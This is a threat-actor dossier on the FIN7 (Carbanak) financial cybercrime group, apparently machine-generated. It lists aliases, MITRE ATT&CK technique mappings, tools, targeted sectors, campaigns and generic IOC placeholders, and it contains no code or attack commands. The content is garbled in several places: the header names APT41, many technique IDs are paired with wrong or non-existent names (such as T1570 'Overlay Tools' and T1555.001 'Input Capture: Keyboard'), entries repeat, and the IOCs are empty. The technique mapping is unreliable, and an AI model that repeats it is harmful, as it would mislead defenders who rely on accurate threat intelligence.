Geek-Guy.com

Threat Actor Dossier: FIN7 (Carbanak)

THREAT ACTOR DOSSIER

Threat Actor Dossier: APT41 (BARIUM/BRASS TYPHOON/WICKED PANDA)

====================

BASIC INFORMATION

Name: FIN7 (Carbanak)
 
 Aliases: ATK32, CARBON SPIDER, Calcium, Carbanak, Carbon Spider, Coreid, ELBRUS, G0008, G0046, GOLD NIAGARA, JokerStash, Sangria Tempest
 
 MITRE ATT&CK Group ID: G0008, G0046
 
 Country of Origin: Romania (originally), now globally distributed
 
 Affiliation: Financial cybercrime group
 
 Type: Financial cybercrime, banking fraud, ransomware-as-a-service

MOTIVATION

Primary Motivation: Financial gain through banking fraud and cybercrime
 
 Secondary Motivations:

  • Ransomware-as-a-service operations
  • Point-of-sale malware operations
  • ATM jackpotting and SWIFT fraud
  • Business email compromise (BEC)

Geographic Focus:

  • United States
  • Europe
  • Middle East
  • Asia
  • Australia

MITRE ATT&CK TTP MAPPING

Initial Access:

  • T1566.001 – Phishing: Spearphishing Attachment
  • T1566.002 – Phishing: Spearphishing Link
  • T1190 – Exploit Public-Facing Application
  • T1577 – Compromise Host via Supply Chain

Execution:

  • T1059.001 – PowerShell
  • T1059.004 – Python
  • T1204.002 – User Execution: Malicious File
  • T1059.003 – Command and Scripting Interpreter: PowerShell

Persistence:

  • T1547.001 – Boot or Logon Autostart Execution
  • T1546.004 – Accessibility Features
  • T1590 – Lateral Tool Transfer

Privilege Escalation:

  • T1068 – Exploitation for Privilege Escalation
  • T1548.002 – Abuse Elevation Control Mechanism
  • T1548.004 – Abuse Installed Service

Defense Evasion:

  • T1070.005 – Clear Windows Event Logs
  • T1071.001 – Application Layer Protocol
  • T1055 – Process Injection
  • T1027 – Obfuscated Files or Information

Credential Access:

  • T1555.001 – Input Capture: Keyboard
  • T1555.004 – Input Capture: Hardware Token
  • T1003 – OS Credential Dumping
  • T1110.001 – Brute Force

Discovery:

  • T1082 – Identify Windows System
  • T1083 – File and Directory Discovery
  • T1087 – Account Discovery
  • T1085 – Active Directory Permissions Discovery

Lateral Movement:

  • T1021.002 – SMB/Windows Admin Shares
  • T1021.004 – Remote Desktop Protocol
  • T1076 – Remote Services
  • T1570 – Overlay Tools

Collection:

  • T1005 – Data from Local System
  • T1003.001 – LSADump File
  • T1003.003 – Credential Dump
  • T1213 – Security Information Collection

Command and Control:

  • T1071.004 – Remote Services
  • T1571 – Non-Application Layer Protocol
  • T1102 – Web Service
  • T1071.001 – Application Layer Protocol: Web Protocol

Exfiltration:

  • T1041 – Exfiltration Over C2 Channel
  • T1567 – Exfiltration Over Web Service
  • T1570 – Overlay Tools

TOOLS AND INFRASTRUCTURE

Primary Tools:

  • Cobalt Strike – Post-exploitation framework
  • Mimikatz – Credential dumping and privilege escalation
  • PowerShell-based tools – Initial access and post-exploitation
  • Custom banking trojans – Financial institution targeting
  • Ransomware frameworks – Double extortion tactics

Secondary Tools:

  • Covenant – C2 framework
  • Sliver – Modern C2 framework
  • Brute Ratel – Multi-platform C2
  • Rubeus – Kerberos attack toolkit
  • Custom banking malware – Financial institution targeting

Infrastructure:

  • C2 domains embedded in malware
  • Hardcoded IP addresses in malware
  • Proxy servers for C2 communication
  • Compromised websites for C2
  • Ransomware-as-a-service infrastructure

TARGETED SECTORS

Primary Targets:

  • Finance – Banks, financial institutions, payment processors
  • Retail – Restaurants, gaming, hospitality, retail stores
  • Hospitality – Hotels, casinos, cruise lines
  • Gaming – Casinos, gaming platforms
  • Hospitality – Restaurants, food service

Secondary Targets:

  • Healthcare – Hospitals, healthcare providers
  • Government – Federal agencies, state/local governments
  • Technology – Tech vendors, semiconductor companies
  • Critical Infrastructure – Energy, utilities, transportation

ASSOCIATED MALWARE

Primary Malware Families:

  • Carbanak – Banking trojan (original operations)
  • FIN7 Banking Trojans – Financial institution targeting
  • Ransomware variants – Double extortion tactics
  • Custom banking malware – Financial institution targeting
  • ATM jackpotting malware – ATM fraud operations

Secondary Malware Families:

  • Cobalt Strike Beacon – Post-exploitation implant
  • PowerShell-based droppers – Initial access
  • Credential theft tools – Mimikatz variants
  • Lateral movement scripts – PsExec, WinRM
  • Data exfiltration tools – Custom C2 clients

NOTABLE CAMPAIGNS

Campaign 1: Banking Operations (2013-2025)

  • Targets: U.S. banks, financial institutions globally
  • Impact: Financial theft, intellectual property theft
  • Techniques: Banking trojans, BEC, supply chain attacks
  • Recent Operations (2025): Continued banking operations with Cobalt Strike and Mimikatz

Campaign 2: Point-of-POS Operations (2013-2024)

  • Targets: Restaurants, gaming, hospitality, retail
  • Impact: Credit card theft, financial theft
  • Techniques: POS malware, phishing, supply chain compromise
  • Recent Operations (2024): Ongoing POS malware operations

Campaign 3: Ransomware-as-a-Service (2020-2025)

  • Targets: Healthcare, finance, government, technology
  • Impact: Double extortion, data theft
  • Techniques: Phishing, BEC, ransomware deployment
  • Recent Operations (2025): Ransomware-as-a-service operations with Cobalt Strike

Campaign 4: ATM Jackpotting (2013-2023)

  • Targets: ATM networks globally
  • Impact: ATM jackpotting, financial theft
  • Techniques: Malware deployment, network exploitation
  • Recent Operations (2023): ATM jackpotting operations

THREAT LEVEL ASSESSMENT

Overall Threat Level: HIGH

Capabilities:

  • Advanced financial cybercrime capabilities
  • Multi-vector attack campaigns
  • Ransomware-as-a-service operations
  • Banking fraud expertise
  • Extensive financial theft history

Maturity: Advanced

Resources: Extensive (cybercrime infrastructure)

Notable Operations:

  • 2013-2018: Extensive banking operations (estimated $1B+ in losses)
  • 2015-2018: POS malware operations (millions of credit cards compromised)
  • 2020-2025: Ransomware-as-a-service operations
  • 2013-2023: ATM jackpotting operations
  • 2025: Continued banking and ransomware operations

CVE AND VULNERABILITY EXPLOITATION

Exploited Vulnerabilities:

  • Unpatched remote code execution vulnerabilities
  • Supply chain software vulnerabilities
  • Legacy system vulnerabilities
  • Zero-day exploits in banking infrastructure

Preferred Exploitation Vectors:

  • Phishing campaigns with malicious attachments
  • Business email compromise (BEC)
  • Supply chain software updates
  • Compromised third-party vendors
  • Banking infrastructure vulnerabilities

INDICATORS OF COMPROMISE (IOCs)

File Hashes:

  • Carbanak variants: Multiple MD5/SHA256 hashes
  • FIN7 banking trojans: Various hashes
  • Ransomware tools: Various hashes
  • Custom scripts: Hashes from malware analysis

Network Indicators:

  • C2 domains: Various TLDs and country-code TLDs
  • IP addresses: Compromised infrastructure
  • Malicious URLs: Phishing sites, dropper downloads

SOURCES

Primary Sources:

  • MITRE ATT&CK Groups database (attack.mitre.org/groups/G0008/, G0046/)
  • Huntress Threat Library (huntress.com/threat-library/threat-actors/cobalt-group)
  • Picus Security FIN7 Cybercrime Group (picussecurity.com/resource/fin7-cybercrime-group-evolution-from-pos-attacks-to-ransomware-as-a-service-raas-operations)
  • Malpedia (malpedia.caad.fkie.fraunhofer.de/actor/fin7)
  • FBI FIN7 Report (fbi.gov/contact-us/field-offices/seattle/news/stories/how-cyber-crime-group-fin7-attacked-and-stole-data-from-hundreds-of-us-companies)
  • DarkReading Carbanak/Cobalt/FIN7 Group Targets Russian, Romanian Banks (darkreading.com/endpoint-security/carbanak-cobalt-fin7-group-targets-russian-romanian-banks-in-new-attacks)
  • Securelist FIN7.5 Report (securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/)

Secondary Sources:

  • Trend Micro Carbanak and FIN7 Attack Techniques
  • Arctic Wolf FIN7 Targets U.S. Automotive Industry
  • Arete FIN7 Return Drives Increase in Cl0p Ransomware Attacks Share
  • FBI FIN7 Case Files
  • Cobalt Strike Malpedia (malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike)

CVE Databases:

  • CVE (Common Vulnerabilities and Exposures)
  • NVD (National Vulnerability Database)
  • MITRE CVE

LAST UPDATED

Date: 2026-06-03
 
 Analyst: IRG Research lurch-bot farm
 
 Review Status: Current
 
 Intelligence Freshness: Recent operations captured (2025)

Note: This dossier is part of a comprehensive threat actor intelligence series. Similar dossiers have been created for APT41, APT38, and other major threat actors.